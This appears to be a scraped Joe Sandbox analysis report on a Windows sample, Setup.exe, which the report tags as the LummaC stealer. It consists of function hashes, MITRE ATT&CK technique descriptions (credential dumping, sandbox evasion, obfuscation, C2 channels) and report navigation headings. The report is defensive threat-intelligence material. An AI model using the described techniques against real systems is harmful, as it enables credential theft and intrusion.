Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf58972e9752b41c77ea9470d037775e7e26683ff057097b105391e09d83d29
Instruction ID: c816362bebb61b2fab0debd22c9e74e6709fb759e8c15388d2ad1d2f4c849621
Opcode Fuzzy Hash: 8cf58972e9752b41c77ea9470d037775e7e26683ff057097b105391e09d83d29
Instruction Fuzzy Hash: 0B116636A943018BD3089B28DC12BBDB3E3BBC7315F28D53CD182E3195EA74A6019A04

Function 02C16769 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f105330dcba7b4e7da4517e21735e1dc41ec70d94cb6c04ea3d756b176464fa9
Instruction ID: 69885ffa38abeb7e780f98830da32cfc0411ca097c49937d6476120e35ad3ba4
Opcode Fuzzy Hash: f105330dcba7b4e7da4517e21735e1dc41ec70d94cb6c04ea3d756b176464fa9
Instruction Fuzzy Hash: 4211593AB917018BD3008F68DCC066AB3A7FBC6319F28D538D49043215D738D5018B55

Function 02C00EE4 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: e0c5d6540d99e8d720b45a04df6f8e725bc7a0b427c874703064c6e168156cf3
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: B7319274E00209DFCB08CF99C590AAEFBB1FF88314F248599D815AB345D375AA82DF94

Function 02C35582 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: f4cc3e809be558225d89703d12729ce8661790932f1092a45777bffa7e7cd782
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 8511A533A091D40EC317CD3C84005A9BFE30ADB575B998799F4F99B2D2D6229E8A8355

Function 02C2AF82 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07d85c1c38fe79e3e3e51b60d29655aeee59ddde69de3f1fd886b92b0784b02
Instruction ID: a4fb496048014cc9fe9b4cc570ca24dc72f7ac928d607e23d723aa9a64230842
Opcode Fuzzy Hash: b07d85c1c38fe79e3e3e51b60d29655aeee59ddde69de3f1fd886b92b0784b02
Instruction Fuzzy Hash: A30171F270031157D720EE5484D4B3BF3A96F94B04F18852CE81457241EF7AED099B91

Function 02C3CF1B Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c139e42a470f480c046a0c9b544efbd403bb230173c101b5f40c319e9c162d6
Instruction ID: ab256e2fa6bb0f231bb23952f59d6fad791bce5458a806b5758122ad1c600db4
Opcode Fuzzy Hash: 6c139e42a470f480c046a0c9b544efbd403bb230173c101b5f40c319e9c162d6
Instruction Fuzzy Hash: 700168B7F521248BC3209E398DC2067B7938BC5014B1F4269C8C4E7312D4B6ED018680

Function 02C04302 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10625e818912976d9812067db313bdc4d07d5714d57296cb586118c133c3331b
Instruction ID: c68e9a2e4af270c12ed732124a9b2887615df91aea2b87a3969df66e556cd3cc
Opcode Fuzzy Hash: 10625e818912976d9812067db313bdc4d07d5714d57296cb586118c133c3331b
Instruction Fuzzy Hash: 22012B3AB5420A0B972CED69ECC4577B3D7DBC5214B0CA13CDA85C7344DA74E6068190

Function 02C38612 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d4113780cfa634ffb64300bccea226f4480a10b125d1b4907e41bd7dc91e29
Instruction ID: f59a62aae0f08c9c6e1844531f4ac576071e42aa96b6c23a45b85c44529b5c78
Opcode Fuzzy Hash: f4d4113780cfa634ffb64300bccea226f4480a10b125d1b4907e41bd7dc91e29
Instruction Fuzzy Hash: 700144BA705A009BE7168F14D8D0A3EB3A6FBA2314F041A3CF44A27211C732EA10CB95

Function 02C2778F Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebff87897b81dd54a3e36200edfaf57bbf3dd6cfbec2db740737a0dd91fd39c4
Instruction ID: 25606c21d88607cd82de02cbb01b513cdceba32461cad4595ee4fca68bccbe0e
Opcode Fuzzy Hash: ebff87897b81dd54a3e36200edfaf57bbf3dd6cfbec2db740737a0dd91fd39c4
Instruction Fuzzy Hash: 891169B4D002548FDB248F66C55076AFFF2BF85700F46859ED4956B7A0CBB48412CF90

Function 02C00C45 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: bd5d9a344baddbe2c6fec7e20a1fde4156f8929ddfec79ae0d3a4874f6597422
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: E301A434A01908EFCB18DF98C1D4BADB7B6FB88314F218599D815AB380C730AF45DB91

Function 02C3C5AC Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87ebc1d96546b512fe8dbe07a7b2ec80aa995a84a41edee677d39afb9802a17c
Instruction ID: 2cb1511b8a46ea625b2204d0c16452b087afaea777d7b8024d7a78a91bef900d
Opcode Fuzzy Hash: 87ebc1d96546b512fe8dbe07a7b2ec80aa995a84a41edee677d39afb9802a17c
Instruction Fuzzy Hash: D5E012F5D601168BDF08DFB0DC8946AB33AEF5320AB049636D10653215E634F11BCB5A

Function 02C28BEC Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99ab3e084bce33916cdb17e1625c8d54c3ba2bc7d8ff6b88b7ca1a02cf10f6c
Instruction ID: 0f835784f70d66b5eaecd09954726658ac37e7e6a42b295479c19624e115a8fa
Opcode Fuzzy Hash: e99ab3e084bce33916cdb17e1625c8d54c3ba2bc7d8ff6b88b7ca1a02cf10f6c
Instruction Fuzzy Hash: 50C04C75D551248BDB005F9498505B9B2356B8A610F05A460D81533251C531D8149A8D

Function 02C22165 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f91f642dbe0502f0ddd48315d17fe3c679931cc5a29e81deed8fa1f1c597485
Instruction ID: 9a2c4c15e4797a5ef338d33aff6e6dc15b2faef929f6a43f1167c8543330a558
Opcode Fuzzy Hash: 8f91f642dbe0502f0ddd48315d17fe3c679931cc5a29e81deed8fa1f1c597485
Instruction Fuzzy Hash: AEB09BD1D014504650516F501C6557A70254A23501F442071DC1511151E629D319559F

Function 02C1E7B5 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8351548f00ec244b9fccf731d6d3c98a3524a84d2cfb97b251a8e0357a20486
Instruction ID: d553e78d702168d83094fefbf841e8f277472f741067338073c5667bf3289028
Opcode Fuzzy Hash: c8351548f00ec244b9fccf731d6d3c98a3524a84d2cfb97b251a8e0357a20486
Instruction Fuzzy Hash: 5CB092E1D4018097D0502F602CA5536B02E0723A01F443432AC1722262E93AD2185A5B

Function 02C23DCA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984f074f994a3e83b1ce56fc731014c2f600eaea401ef17fa1fd869a54eb7c09
Instruction ID: 4fd0c7441b27b54d7fb29d2e3389eed9829a89f386f9236c8699329fadaf0e72
Opcode Fuzzy Hash: 984f074f994a3e83b1ce56fc731014c2f600eaea401ef17fa1fd869a54eb7c09
Instruction Fuzzy Hash: 64B09224B1C2449E8201CF128400135F2B8928F101F20E8689019A3101D634D0048B08

Function 02C3DA23 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030a9de4a080a3cc17b1c1d927514806d75642043f74f066a6881fa611843a0d
Instruction ID: 932c8f1affd835904ddb3fee99de2ddb74defae089e213ee77c8bb246e76f1af
Opcode Fuzzy Hash: 030a9de4a080a3cc17b1c1d927514806d75642043f74f066a6881fa611843a0d
Instruction Fuzzy Hash: 07B009B8A486008FC250DF18D484974F7F9AB0F211F16A869E488E7222D231E8808A4A

Function 02C23DD2 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204a1eb3fe52eb6cf486f0ec64d89658dd26d2de73f7a7ac9798e4c27ce2d30a
Instruction ID: 0fd3e69b2f6fbd026ee6da5a7d91b9335caaca5cf1e49208c5a1529714276c91
Opcode Fuzzy Hash: 204a1eb3fe52eb6cf486f0ec64d89658dd26d2de73f7a7ac9798e4c27ce2d30a
Instruction Fuzzy Hash: ABB09234A082008F8200CF05C040525F3B8A78F201F20E058D018A3221C230D4008F08

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
Setup.exe

Function 02C009E5 Relevance: 7.6, APIs: 5, Instructions: 100
threadprocessCOMMON

Function 02C00895 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 02C002D5 Relevance: 3.4, APIs: 2, Instructions: 399
threadCOMMON

Function 02C4D313 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 02C4BF65 Relevance: 2.8, APIs: 2, Instructions: 325
memoryCOMMON

Function 02C36932 Relevance: 116.6, Strings: 93, Instructions: 365
COMMON

Function 02C359C2 Relevance: 44.1, Strings: 35, Instructions: 319
COMMON

Function 02C10F18 Relevance: 17.2, Strings: 13, Instructions: 939
COMMON

Function 02C11D1F Relevance: 17.0, Strings: 13, Instructions: 767
COMMON